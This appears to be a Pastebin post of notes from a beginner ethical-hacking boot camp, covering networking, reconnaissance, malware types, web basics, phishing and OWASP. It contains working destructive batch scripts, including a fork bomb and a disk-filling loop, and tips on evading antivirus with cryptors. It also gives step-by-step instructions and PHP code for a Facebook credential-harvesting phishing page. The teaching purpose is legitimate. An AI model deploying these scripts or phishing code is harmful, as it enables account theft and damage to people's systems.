Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Boot Camp Day 1
- ===============
- Session 1
- =========
- Introduction to Information Security
- ------------------------------------
- Information
- -----------
- Collection of data is known as Information. Information makes a complete meaning.
- Data
- ----
- It is raw facts and figures. Data can be anything.
- Text
- Number
- Image
- Audio
- Video
- Data itself, a single piece of data never makes a sense.
- Security
- --------
- To protect and secure from leakage and breaches.
- Information
- ===========
- Personal Information
- Sensitive Information
- Financial Information
- Economical Information
- Banking Information
- Hackers
- =======
- The person who have the highest amount of knowledge in the field of computer and technology.
- How a system is working.
- How processes are working.
- How my new technologies are working.
- Client side and server side process.
- Hacking
- =======
- Gaining someine's data with or without their authorisation. Legally or illegally.
- Types of Hackers
- ================
- 1. White Hat Hacker
- They are good people, who work for the welfare of the organisation. They work for the security only.
- Rahul Tyagi
- Abhijeet Singh
- Sanjeev Multani
- 2. Black Hat Hacker
- They are really bad people, which brings chaos and destruction to the cyber society. They have only one thing in mind.... Money.
- Mitinik
- New Lizard Suqad
- 3. Grey Hat Hacker
- They are the combination of both. They hack into the stuff and uncurtain the dirty things. They have only one focus ---> Welfare of the society and the people.
- Anonymous
- The Legions
- Hacktivism
- Julian Assange --> The Wikileaks
- Edward Snoden
- Script Kidies
- -------------
- Copy + Paste --> Who just uses the codes and techniques that are created by others without knowning how things are working.
- N00bz
- -----
- They are new babies who are trying to learn something new in the world of cyber.
- Crackers
- --------
- They are not the hackers but they are very very good at cracking the passwords. File passwords, Folder password, OS password, Email password.
- Why Do People Hack?
- -------------------
- Security
- Money
- Revenge
- Curiosity|knowledge
- Fame
- Zoo Zoo Hacker
- Rafi Hacker
- Cyber Crimes And Laws
- =====================
- IT Act 2000 and IT Act 2008
- 28 Types of cyber crime, but all of them are categorised into these few group:
- --> Hacking
- --> Identity Theft
- --> Insult, Online Defamation
- --> Harrasament
- --> Cyber Terrorism
- Section 43:
- Penalty and compensation for damage to computer and computer system
- Section 65:
- Tampering with Computer Source Documents
- Section 66:
- Computer Related Offences
- Section 67:
- Punishment for publishing or transmitting obsence material in electronic form
- Section 71:
- Penalty For Misrepresentation
- Section 72:
- Breach of confidentiality and privacy
- Section 73:
- Penalty for publishing electronic signature certificate false in certain patricilar | Signature Forgery
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 2
- =========
- Network Terminology I
- ---------------------
- Network
- =======
- Connection of two or more IT Electronic Devices, with a sole purpose of Information Interchange.
- Topology
- ========
- How my devices are connected to each other in the network. Physical layout of the network.
- 1. Star Topology
- ================
- When all of my end devices are connected to a central connecting device.
- If my central device is down, then communication is not possible.
- 2. Ring Topology
- ================
- When all of my end devices are connected in a closed circular chain.
- There are two ways of communication in Ring Topology
- 1. Unidirectional
- Either clock or anti clock
- 2. Bidirectional
- Data can go through any direction
- 3. Mesh Topology
- ================
- When all of my devices are connected to every device in the network.
- 4. Bus Topology
- ===============
- When all the end devices are connected to a central communicating line, which is known as Back Bone.
- 5. Hybrid Topology
- ==================
- When two or more type of topologies are connected in the network.
- Protocols
- =========
- Set of rules and regulations, which are required by every device to follow, to commnunicate in the network.
- 1. IP --> Internet Protocol
- 2. TCP --> Transmission Control Protocol
- 3. UDP --> User Datagram Protocol
- 4. FTP --> File Transfer Protocol
- 5. HTTP --> Hyper Text Transfer Protocol
- 6. SMTP --> Simple Mail Transfer Protocol
- 7. VoIP --> Voice Over Internet Protocol
- 8. DHCP --> Dynamic Host Configuration Protocol
- IP Address
- ==========
- Internet Protocol Address
- -------------------------
- It is a virtual address which is provided to a device, which is connected to a network or internet, just for communicating. It is unique in a network.
- Version of IP Address
- =====================
- 1. IPv4
- 2. IPv6
- 1. IPv4 --> Internet Protocol Version 4
- ----------------------------------------
- It is a 32 bit long address, divided into 4 octets and seperated by a period.
- 192.168.0.28 ---> IPv4
- 4 octets --> 192|168|0|28
- Because I can represent a number using 8 bits(0 and 1)
- Periods --> dot(.)
- 192 = 128+64 = 11000000
- 168 = 128+32+8 = 10101000
- 0 = 00000000
- 28 = 16 + 8 + 4 = 00011100
- 128 64 32 16 8 4 2 1
- =========================================================
- 1 1 0 0 0 0 0 0 192
- 1 0 1 0 1 0 0 0 168
- 0 0 0 0 0 0 0 0 0
- 0 0 0 1 1 1 0 0 28
- 192.168.0.28 = 11000000.10101000.00000000.00011100
- It is composed of decimal numbers only. --> 0-9
- Total Number Of IP Address --> 2^32 IP Addresses
- 0.0.0.0 - 255.255.255.255
- Classes of IPv4 Addresses
- =========================
- 1. Class A --> 0.0.0.0 - 127.255.255.255
- 2. Class B --> 128.0.0.0 - 191.255.255.255
- 3. Class C --> 192.0.0.0 - 223.255.255.255
- 4. Class D --> 224.0.0.0 - 239.255.255.255
- 5. Class E --> 240.0.0.0 - 255.255.255.255
- Class D and Class E --> Military and research and development purpose.
- 2. IPv6 -> Internet Protocol Version 6
- ======================================
- It is 128 bit long address. It is composed of hexa decimal values. Last 32 bit of IPv6 addresses are taken from MAC Address.
- 0000:0000:0000:0000:0000:0000:0000:0000
- FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
- Total number of IPv6 --> 2^128
- 0000:fe80:0000:f68c:50ff:fe5f:9718
- 5f:97:18
- f4:8c:50:5f:97:18
- Types of IP Address
- ===================
- 1. Public IP Address | Global IP Address
- IP Address which is provided by the ISP or that of ISP
- Google.com --> myipaddress --> 125.63.71.34
- ipcow.com ----> 125.63.71.34
- ipchicken.com > 125.63.71.34
- User-Agent Information
- ======================
- Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
- Hostname = 125.63.71.34.reverse.spectranet.in
- Device = X11
- Operating System = Ubuntu
- Browser Name = Firefox
- Browser Version = 60.0
- Is Mobile Device = False
- Is Beta = False
- Screen Resolution = 1366 x 768
- 2. Private IP Address | Local IP Address
- This is the IP Address which is provided to end devices which are connected in the network, by the router.
- MS-OS --> cmd ---> ipconfig
- Linux/Unix --> Terminal --> ifconfig
- ifconfig --> interface Configuration
- IP Subnetting
- =============
- Division of IP Address into further sub network so that IP wastage is reduced.
- NAT --> Network Address Translation
- ===================================
- It is a service used just above the router so that my Private IP Address can be converted and mapped into Public IP Address and Public IP Address into Private IP Address.
- DHCP
- ====
- Dynamic Host Configuration Protocol
- -----------------------------------
- It is the protocol which works in the router. It is responsible for allocating an IP Address to the connected device in the network.
- IP-Pool
- =======
- It is collection of IP Addressm which can be provided to the devices.
- DHCP Server
- ===========
- It is the server which provides IP Address to the devices from the IP Pool.
- DHCP allocates the IP Address on the basis of lease time period.
- MS-OS
- =====
- cmd ---> ipconfig /release
- ipconfig /renew
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 3
- =========
- Network Terminology II
- ======================
- Types Of Network
- ----------------
- 1. PAN --> Personal Area Network --> Bluetooth, ShareIt --> 1-10m
- 2. LAN --> Local Area Network --> WiFi, whole Campus --> 10m-5Km
- 3. MAN --> MetroP. Area Network --> Whole City --> 5km-50km
- 4. WAN --> Wide Area Network --> Internet -->
- LAN --> Collection of PAN
- MAN --> Collection of LAN
- WAN --> Collection Of MAN
- 1. Intranet --> Intra -> Inside | Net -> Network
- Network Infrastructure which works inside a campus, cannot be accessed by people outside the campus
- 2. Internet --> Connection of two or more networks
- Ports
- =====
- Are specific gateways vai which a device can use or access the external service. There are two different types of ports:
- 1. Physical Ports
- 2. Virtual Ports
- 1. Physical Ports
- =================
- These are the ports which we can see, touch and can take the services. Which are present in the device and are used for connecting some different hardwares.
- USB
- Audio Jack
- HDMI
- VGA
- Charging Port
- 2. Virtual Ports
- ================
- These are the ports via which i can use the network services. They are not tangible, but can use the services. External and specific services.
- There are 65,555+ virtual ports.
- They are also of three types:
- 1. Well-Known | Pre-Defined Ports
- 2. Registered Ports
- 3. Dynamic Ports
- 1. Well-Known | Pre-Defined Ports
- =================================
- These are the ports which are defined by internet community for running and hosting some specific services. The services over these ports cannot be changed.
- 21 --> FTP
- 22 --> SSH
- 23 --> Telnet
- 80 --> HTTP
- 443 --> HTTPS
- These services can also run on other ports, but on these ports only these service will run.
- Ports under 1-1024 are categorised under this kind of port.
- 2. Registered Ports
- ===================
- These are the ports which are registered by certain organisations for running their specific services.
- Orcale ----> Database ---> MySQL --> 3306
- Apple -----> iPhone -----> iTunes -> 3689
- Black Berry Enterprise ---> server > 3101
- 3. Dynamic Ports
- ================
- These are the ports which are neither Pre-Defined nor registered ports, and can be used by any computer user locally for their own purpose.
- 1337 --> LEET port | Hacker's Port
- Our computer is a dumb device. We humans can remember the names very easily but computer can only understand a language, that is of numbers. So for computers it is easy to remember the number as compared to the name.
- DNS
- ===
- Domain Name System|service
- ==========================
- This service is used to map IP address to domain name and helps in fetching the response of the specified request.
- www.google.com ----> Open front end of google
- 172.217.161.4 -----> Open front end of google
- www.google.co.in --> 172.217.24.227
- www.google.co.in
- in --> indian domain
- co --> company domain inside india
- google ----> domain whose name is google
- root ---> www|mail|drive|calander
- Proxy
- =====
- These are the dummy servers, which are used for hiding and masking my IP Address. Public IP Address.
- kproxy.com
- ipcow.com ---> 125.63.71.34 ---> Original IP Address (Public)
- kproxy.com --> ipcow.com ---> 192.95.12.100 -> Proxy wala IP Address
- VPN --> Virtual Private Network
- ===============================
- They just work like proxy servers but they are much more advance then the proxy servers in the following ways:
- 1. They are used to maintain the anonymity, hiding and masking IP Address
- 2. They provide the encryption of data.
- 3. They provide the tunneling.
- Secret Passage
- Connecting to the internal network of an organisation
- Services
- ========
- 1. Online Based Service ----> kproxy.com
- 2. Extension Based Service -> anonymox
- 3. Standalone Service ------> Proper softwares or hardwares which provide us these services.
- psiphon3
- UltraSurf
- Proxpn
- HotSpot Shield
- openVPN
- OSI Model
- =========
- Open System Interconnection Model
- ---------------------------------
- It is a model which was used for commincation in the network. But due to some obvious reasons, this model was made an ideal model. This model is not used at all.
- OSI is 7 layer approach model
- 1. Physical Layer
- 2. Data Link Layer
- 3. Network Layer
- 4. Transport Layer
- 5. Session Layer
- 6. Presentation Layer
- 7. Application Layer
- TCPIP Model
- ============
- It is 4 layer based model. Which is similar to OSI model. Layers are again independent of each other but it's working is very very fast as compare to that of OSI model.
- Web Technology Basics
- =====================
- 1. Domain Name
- 2. Hosting Space
- 3. Server
- 4. DataBase
- 5. Technology
- Client Side
- Server Side
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 4
- =========
- Information Gathering and Digital Footprinting
- ==============================================
- Phases of hacking
- -----------------
- These phases are must to follow in order to perform any kind of hacking.
- 1. Information Gathering
- 2. Scanning
- 3. Gaining Access
- 4. Maintaining Access
- 5. Covering Traces
- Information Gathering
- ---------------------
- To collect as much Information as possible about the target.
- Information Gathering is divided into further
- 1. Network Specific
- 2. Target Specific
- 1. Network Specific
- ===================
- To collect the information about the network
- Number Of people Connected
- IP Address allocated to the connected devices
- MAC Address
- Name Of the Vendor
- If possible --> Access of the shared folder
- 1. Advanced IP Scanner
- 2. Angry IP Scanner
- 3. Soft Perfect Network Scanner
- https://www.softperfect.com/products/networkscanner/
- NMAP --> Network Mapping tool
- 2. Target Specific
- ==================
- i. Web site or web application
- ii. Human Specific
- Web site or web Application
- ===========================
- IP Address
- Ping
- > 65.52.169.46
- Server Information
- Dedicated or shared
- https://www.yougetsignal.com
- Database Information
- MX and NX Records
- Name of the registrar
- Technologies
- White list and Black List
- |--> robots.txt
- https://whois.net/
- https://www.yougetsignal.com
- https://whois.icann.org/en
- https://mxtoolbox.com/
- wapalyzer --> extension --> helps me in gathering information about the technologies used behind a web site or web application.
- Online Nmap
- https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
- Human Specific
- ==============
- Social Network
- Social Networking Websites
- Linkedin
- Twitter
- Facebook
- Dating Websites
- Matrimonial Websites
- Job Portals
- Fake Surveys
- Spy Services
- Tools
- =====
- Maltego
- It is corporate level information gathering tool. It helps in gathering information about each and every aspect.
- Community Edition ---> Free
- All transformations does not work in free edition.
- https://www.paterva.com/web7/downloads.php
- OS Login Bypass
- ===============
- When you log into the OS, then while starting the windows, you will be asked for password.
- 1. Online Method
- 2. Offline Method
- 1. Online Method
- ================
- When you need to crack or bypass the password, change the OS login password when the system is up, and you do not know the current password. It only works in windows ultimate or professional version.
- 1. Right click on "My Computers"
- 2. Click on "Manage"
- 3. Click on "Local Users and Groups", in the left pane
- 4. Click on "Users"
- 5. Choose the user, for whom you want to change the password.
- 6. Right Click
- 7. Set Password
- 2. Offline Method
- =================
- This is the condition, when the device is in shut down mode and we cannot open the group editing policies.
- SAM --> Security Account Manager
- C:WindowsSystem32ConfigSAM
- Hiren Boot CD
- Kon Boot CD
- These are live bootable OS. We use tools like Rufus, to make the media bootable.
- BIOS --> Basic Input Output System
- Live OS ---> It replaces the BIOS of the Computer or the device from the one which is in the bootable media.
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 5
- =========
- Malware Illustration
- --------------------
- Malware --> MAL + WARE
- MAL -> MALicious
- WARE -> softWARE
- Malware are malicious softwares which can cause harm to the system. These can be anything, tools, applications, softwares, file.
- Types Of Malware:
- 1. Virus
- 2. Worms
- 3. Trojan
- 4. Keyloggers
- 5. Spywares
- 6. Ransomware
- 7. Botnet
- 8. Rootkits
- 9. Adwares
- 1. VIRUS
- ========
- Vital Information Resource Under Seize
- Virus can be an application, tool, software, which can harm the system and system files of the device.
- Symptoms of virus
- Slow
- Slow Processing
- Delete
- Attribute change
- Extension Change
- Shortcut keys|Files
- It will remain dormant, until a user executes it. Virus needs human assistance for executing itself.
- Batch File Virus
- ================
- 1. Infinite Folder
- ------------------
- :loop
- mkdir %random%
- goto loop
- 2. Cascading folder and file
- ----------------------------
- :rudra
- mkdir rudr
- echo Hello Boys... Me acha hu...!! >>rudr.txt
- cd rudr
- goto rudra
- 3. Space Eating Virus
- ---------------------
- echo hello>>file.txt
- :loop
- type file.txt>>file.txt
- goto loop
- 4. Process Calling
- ------------------
- :loop
- start cmd.exe /c
- goto loop
- 5. Fork Bombing
- ---------------
- %0|%0
- https://lucideustech.blogspot.com/2018/04/mac-os-login-screen-bypass-with.html
- aran.kuanr@gmail.com
- aran.k.uanr@gmail.com
- ara.n.k.u.anr@gmail.com
- a.r.a.n.k.u.a.n.r@gmail.com
- 2. Keyloggers
- =============
- These are the applications which are used to grab the key strokes of the devices. It is just like an extra layer, which takes the keys and dump them on the screen.
- 1. Online Based| Remote --> iStealer
- 2. Local Storage
- Family Key Logger
- http://www.spyarsenal.com/download.html
- BPK Keylogger
- Refog Keylogger
- Screenshoter --> when ever you press anything, key or mouse click, then your application will take a screenshot.
- Screen Recorder
- 3. Ransomware
- =============
- It is when your system gets hijack and all the system files get encrypted by the attacker and you need to pay some ransom to the attacker for decrypting the files.
- WannaCry
- Pateya
- Bad Rabbit
- 4. Worms
- ========
- These are the malwares which spread by itself. It nees human assistance just for once. Common feature
- Replication
- Copy Itself
- Speard Through Pen drive or mail
- It is target specific
- Conficker worm --> 1,00,000 Devices
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 6
- =========
- 5. Trojans
- ----------
- These are the malwares which helps an attacker to gain the remote access of the target device. Remote Access ---> Backdooring. I can have the access, can download any file, can upload anyfile. can use anything and can manipulate the data.
- There are two types of trojans:
- 1. Forward Connection
- 2. Reverse Connection
- 1. Forward Connection
- ---------------------
- When the attacker have the target's IP Address, then he can directly attack the system.
- 1. Target keeps on moving --> IP Address of the target will keep on changing
- 2. It will be very very hard for an attacker to get the target's IP Address everytime, when he will change the location.
- 2. Reverse Connection
- ---------------------
- The attacker do always have his own IP Address. then the attacker can craft an application which is embedded with his own IP Address. He will send the application to the target. As soon as the target will execute the application, the attacker will receive a reverse remote connection.
- RAT --> Remote Administrative|Access Tools
- These are third party tools which are used for creating Trojans.
- Dark Comet
- How Does Anti-Malware Works
- ===========================
- All of the Anti-Malware works on the basis of signature. If they have the signature of the trojan in the database, it means, that it is a malware else the file is clean.
- How to evade Anti-Malware?
- ==========================
- If I can change the signature it means I can evade the Anti-Malware. We will change the signature of trojan, so that we can evade Anti-Malware.
- With the help of these tools we can change the signature of the trojan:
- 1. Binders
- 2. Cryptors
- 3. Hex Editors --> Neo Hex Editor
- 4. Obfusscators -> Red Gate Smart Assambely
- Binder and cryptor
- ==================
- Chrome Cryptor
- URGE Cryptor
- Raw --> 57/65
- Raw + Chrome Cryptor --> 35/65
- Raw + Chrome Cryptor + URGE Cryptor --> 29/60
- Raw + Chrome Cryptor + URGE Cryptor + Red Gate Smart Assambely --> 12/65
- Downlaod and install, you will get paytm cash back of 500/-
- Downlaod and install the best antivirus
- Download the facebook hacker --> hack any facebook account by this application
- Download and install ---> will help you in securing your device 100% gauranteed
- Scan the network with angry IP Scanner
- 6. Botnets
- ==========
- BOTNET = BOT + NET
- BOT = roBOT
- NET = NETwork
- It means that you are connected in the network, and are controlling many devices.
- The attacker deployed the trojan in n number of systems and devices and controlling it. That whole network of trojan is known as botnet.
- Ares Botnet
- https://github.com/sweetsoftware/Ares
- 7. Rootkits
- ===========
- Which are or can be planted in the root of the device. Administrator, Kernel.
- These are the malwares which attacks and effects the kernel level and hard to find and hard to remove.
- System Protection From Malwares and Secure System Configuration
- ===============================================================
- Security
- --------
- 1. Firewall Should always be enabled.
- 2. Anti-Virus Should always be installed and updated.
- 3. Windows patches and updates.
- 4. Always use sandbox|Virtualised environment for analysing or running a suspicious application.
- Sandboxie --> Virtual and simulated environment for analysing
- Virtual Box Simulation
- 5. EXE radar
- Configuration
- -------------
- 1. attrib --> for checking the attribute
- 2. services
- 3. Activated services
- 4. Startup Service
- msconfig ---> startup
- 5. netstat
- 6. netstat -b
- -b --> applications which are binded to the port
- 7. netstat -ona
- all | ports | Numeric Form
- 8. Firewall Rule
- https://lucideustech.blogspot.com/2018/02/tracing-and-terminating-reverse.html
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 7
- =========
- Introduction to web Architecture and Components
- -----------------------------------------------
- 1. Domain Name
- ---------------
- godaddy.com
- hostgator.com
- 2. Hosting Space
- ----------------
- 000webhost.com
- 3. Server
- ---------
- They are the applications or hardwares which are used to run other programs. server side programs. php script.
- It manages the request and response.
- When a user enters something in the url bar ---> a request is generated
- At the same time, when user receives the data -> a response is received
- Servers are again of 2 types:
- 1. MS OS Based server
- IIS --> Internet Information Services
- 2. Linux Based Servers
- Apache | Tomcat
- 4. Database
- -----------
- It is known as the backbone. It stores the data of the web site or the web application. It stores the data in a tabular way.
- Database --> Tables --> Columns --> Rows (Data)
- Database is again of two type:
- 1. MS OS --> MSSQL
- 2. Linux --> MySQL
- 5. Web Technologies
- -------------------
- These are the coding languages or scripting languages in which our web site or web application is biuld.
- They are also divided into 2 types
- 1. Client Side | Front End Scripting Language
- 2. Server Side | Back End Scripting Language
- 1. Client Side Scripting
- These provides the UI to the web site or the web application. It is what a user sees on the web browser.
- These require just a browser to run.
- HTML
- 2. Server Side Scripting
- These are what works on back end. They require a server to run.
- PHP
- MS OS --> ASP.NET
- Linux --> PHP
- MS OS --> IIS + MSSQL + ASP.NET ---> Money
- Linux --> Apache|Tomcat + MySQL + php ---> Money
- Local Hosting Server
- ====================
- By using these third party application for free, you can launch and host the application or the web site on the LAN and can run the testing for the same. There is no money involved, I can test the application for free.
- 1. Windows Based Server --> WAMPP
- W --> Windows
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- 2. Linux Based Server --> LAMPP
- L --> Linux
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- 3. Cross Platform Based Server --> XAMPP
- X --> Cross Platform
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- After Installing XAMPP
- ======================
- 1. Apache
- 2. MySQL
- we need to start these two services.
- How To Access XAMPP Server
- --------------------------
- There are 3 ways via which we can access the xampp server. Open the browser
- 1. localhost
- 2. 127.0.0.1
- 3. Hosted system's IP Address
- Web Security Misconfigurations
- ------------------------------
- 1. If I do have a good firewall, I am secure.
- 2. If I do have a good IDS and IPS, I am secure.
- 3. If the web site of the web application is using HTTPS, I am secure.
- HTML
- ====
- Hyper Text Markup Language
- --------------------------
- Front end developing language. which requires a browser to run.
- 1. HTML --> Each and everything of the front end is written in this tag.
- <html>
- xxxxxx
- xxxxxx
- xxxxxx
- </html>
- 2. Head --> Contains the meta data
- Links of styles, title, date etc etc
- <head>
- xxxxxx
- xxxxxx
- xxxxxx
- xxxxxx
- </head>
- 3. title --> to provide the title to the tab
- <title>Name_Of_The_Title</title>
- 4. Body --> Which contains the whole of the code of the web site and the web application. I works after the head is closed.
- <body>
- xxxxxx
- xxxxxx
- xxxxxx
- </body>
- 5. Paragraph -->
- <p>.....
- ........
- ........
- ........
- </p>
- 6. Break
- <br> --> It is single tag. It doesnot needed to close
- 7. Heading
- There are 6 types of heading tag
- h1
- h2
- h3
- h4
- h5
- h6
- as the number increases, the font size decreases.
- 8. anchor --> to provide the hyper link to anything
- <a href="#">............</a>
- 9. Image
- <img src=""></img>
- 10. Form
- <form action="Kis page p redirect krna hai after clicking submit button" method="GET|POST">
- </form>
- 11. Input
- <input type="text|number|date|password" id="Unique ID" name="Name Of the Element">
- 12. iframe
- <iframe src="http://www.lucideus.com"></iframe>
- ==========
- pagee.html
- ==========
- <html>
- <head>
- <title>CII</title>
- </head>
- <body>
- <p>
- <h1>Grade 2<br>
- =======</h1>
- <h2>Session 1<br>
- ---------</h2>
- <a href="http://www.lucideus.com"><h3>Introduction To Cryptography</a><br>
- ----------------------------</h3>
- Cryptography --> Conversion of text into another form, which is readable but
- not understandable.
- <br>
- Conversion of plain text into an encrypted text via an algorithm which uses a
- key, after transmission, decryption of the encrypted text into the plain text
- via same algorithm and the key.
- <br>
- Plain Text --> It is a normal Text, which is typed by the user. which is
- readable and understandable to everyone.<br>
- Cipher Text --> Encrypted text, which is the output of the encryption.<br>
- Encryption --> Process of converting plain text into a Cipher text, it is
- readable but not understandable<br>
- Decryption --> Reverse of encryption, conversion of Cipher text into a plain
- text<br>
- Algorithm --> It is the code which is used to encrypt and decrypt the plain
- text into cipher text and cipher text into plain text.<br>
- Key --> it is a special function, encryption and decryption is possible just
- due to this key. <br
- </p>
- <img src="naruto.jpg" height="700"></img>
- <form action="mera.html" method="GET">
- Username :<input type="text" id="uname"><br>
- Password :<input type="password" id="pass"><br>
- <input type="submit" id="but">
- </form>
- </body>
- </html>
- =========
- mera.html
- =========
- <html>
- <head>
- <title>Second Page</title>
- </head>
- <body>
- <p>
- This is my second page</p>
- <iframe
- src="http://www.lucideus.com"></iframe><br>
- <img src="goku.jpg" height="500"></img>
- </body>
- </html>
- PHP Basics
- ==========
- Server Side Scripting Language
- <?php
- xxxx
- xxxx
- xxxx
- xxxx
- ?>
- <?php ---> Start of PHP code
- ?> ---> End of php code
- echo "Hello Guys"
- $var --> var is name of variable
- $hack --> Hack is name of variable
- $ ---> used to declare a variable
- $_POST
- $_GET
- =========
- CALL.html
- =========
- <html>
- <head>
- <title>Calculator</title>
- </head>
- <body>
- <form action="calc.php" method="post" attribute="post">
- First Value : <input type="text" id="first" name="first"><br>
- Second Value : <input type="text" id="second" name="second"><br>
- <input type="radio" name="group1" id="add" value="add" checked="true">ADD<br>
- <input type="radio" name="group1" id="subtract" value="subtract">SUBTRACT<br>
- <button type="submit" id="answer" value="answer">Calculate</button>
- </form>
- </body>
- </html>
- ========
- calc.php
- ========
- <html>
- <head>
- <title>Jawab</title>
- </head>
- <body>
- <p>
- The Answer is:
- <?php
- $first=$_POST['first'];
- $second = $_POST['second'];
- if($_POST['group1'] == 'add')
- {
- $ans=$first+$second;
- echo $ans;
- }
- if($_POST['group1'] == 'subtract')
- {
- $ans=$first-$second;
- echo $ans;
- }
- ?>
- </p>
- </body>
- </html>
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 8
- =========
- Phishing
- --------
- It is a technique in which an attacker creates and develop a fake page or a fake web site, which look completely authentic and genuine. but it is not. He deploys the same and make people to enter their credentials.
- 1. Spear Phishing
- 2. Vector Phishing | Credential Harvestor
- 1. Spear Phishing
- -----------------
- Targeting a single or an individual or the crowd of people having common interest. Target Specific.
- 2. Credential Harvestor
- -----------------------
- It is not target specific. Any kind of person can come and enter their credentials. I just need to collect the credentals of the crowd for my own purpose.
- Create Facebook's Phishing Page
- ===============================
- 1. Open Your Browser
- 2. Goto www.facebook.com
- 3. Right Click on the login page ---> view page source
- 4. Select all ---> copy
- 5. Open notepad and paste the whole code
- 6. Scroll to the very top of the code.
- 7. Ctrl+F ---> action=
- action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
- 8. In the received parameter
- https://www.facebook.com/login.php?login_attempt=1&lwv=110
- Replace it with fish.php
- fish.php
- ========
- <?php
- header ('Location: https://www.facebook.com');
- $handle = fopen("coffee.txt", "a");
- foreach($_POST as $variable => $value) {
- fwrite($handle, $variable);
- fwrite($handle, "=");
- fwrite($handle, $value);
- fwrite($handle, "
- ");
- }
- fwrite($handle, "
- ");
- fclose($handle);
- exit;
- ?>
- Understanding The Code
- ======================
- <?php ---> start of the php code
- header ('Location: https://www.facebook.com');
- when the working of the php code is done, then redirect the user to https://www.facebook.com
- $handle = fopen("coffee.txt","a");
- $handle ---> Variable
- fopen --> to open a file
- It will open a file, coffee.txt
- When we open a file, I need to pass an attribute, which says in which mode the file should open. There are 3 major attributes
- 1. Read --> r
- This attribute is used for just reading the content of the file.
- 2. Write -> w
- This attribute is use to write the content in the file.
- 1. If there is no file name which we passed, then it will create a new file with the same name.
- 2. If there is a file with the name and there is data inside the file, it will delete all the data and start writing the new data from the beginning, Overwrite.
- 3. Append-> a
- It is same like write, but it never deletes data but, it will start continue to write the data in the same file.
- foreach($_POST as $variable => $value)
- It is for loop in php. It says jb tk mere pass data POST method se aa rha hai, tb tk ye loop chalta rahe.
- $variable => $value
- Phone or email => abc.cyb@gmail.com
- fwrite($handle, $variable); --> 1
- fwrite($handle, "="); ---> 2
- fwrite($handle, $value); ---> 3
- fwrite($handle, "
- "); --->4
- fwrite --> to write data into the file
- fwrite($handle, $variable);
- $handle ---> specify the file in which we want to write
- $variable --> data which is to be stores in the file
- 1 2 3
- email or phone = Store the value inputed by the user
- 4 --->it will enter a new line and start from the begining of the next line
- fclose($handle);
- It means to close the open file ---> coffee.txt
- exit;
- To stop the execution of the code and redirect to the user to the site specified in header
- ?> --> close of php code
- IDN Homographic Attack
- ======================
- There are many languages in the world. Among those language there are many characters which are similar to english characters.
- To human eye, those similar characters do not have anby difference but to computer they do have the difference of their ASCII Value.
- а, с, е, о, р, х and у --> Russian
- a, c, e, o, p, x and y --> English
- deepika Padukone --> English
- dеерikа раdukоnе --> Cyrallic + English
- Case Study - Must Read
- ======================
- https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html
- Social Engineering
- ==================
- To bluf someone in order to take the sensitive data. It is hacking without coding, Human mind hacking. An attacker can reterive the data or can make others to do his dirty works.
- Fake Mails
- ==========
- Sending ----> https://emkei.cz/
- https://getgophish.com/
- https://www.youtube.com/watch?v=knc6Iq-hNcw&t=114s
- Receiving ----> www.temp-mail.org
- haveibeenpwned.com
- https://howsecureismypassword.net/
- Email Tracing and Tracking
- ==========================
- https://grabify.link/ --> Try it yourself
- http://www.fuglekos.com/ip-grabber/index.html -->
- http://whoreadme.com
- Email Encryption
- ================
- End-to-end encryption.
- encipher.it
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 9
- =========
- Introduction to Vulnerability Assessment and Penetration Testing
- ----------------------------------------------------------------
- VAPT --> Vulnerability Assessment and Penetration Testing
- V --> Vulnerability
- Loopholes, week security, security misconfiguration. From where an attacker can intrude and compromise your system.
- A --> Assessment
- To scan for the Vulnerability.
- P --> Penetration
- To beach into the system using the above Vulnerability. To hack into or to compromise the system
- T --> Testing
- To generate the report and to pass down. To test the above Vulnerability and to create a report for the same.
- VA --> Vulnerability Assessment
- To scan the web application and to report the Vulnerability
- PT --> Penetration Testing
- To beach into the system and report about those Vulnerabilities.
- VAPT --> Vulnerability Assessment and Penetration Testing
- When we talk about web application VAPT
- ========================================
- OWASP
- =====
- Open Web Application Security Project
- -------------------------------------
- It is non-profit charitable organisation, which works towards the security of the web application. They gather the information from all around the globe. They gather the information through CTF initiative.
- They open challange the whole hacking community, to hack into the online system and capture the flag, in return, they will provide with the bounty. They gather the logs of the attacks which are performed in the CTF.
- After gathering the whole logs, they perform the analysis of these logs and categorise the attacks accordingly.
- They release a list of 10 attacks.
- OWASP TOP 10. --> top 10 attacks.
- 1. Injection
- 2. XSS --> Cross Site Scripting
- 3. CSRF --> Cross Site Request Forgery
- 4. IDOR --> Insecure Direct Object References
- 5. Sensitive Data Exposure
- 6. Missing Function Level Access Control
- 7. Broken Authentication and Session Management
- 8. Invalidated Redirects and Forwards
- 9. Security Misconfigurations
- 10. Using Components with known Vulnerabilities
- OWASP 2013 --> Stable
- OWASP 2017 --> Data sufficient
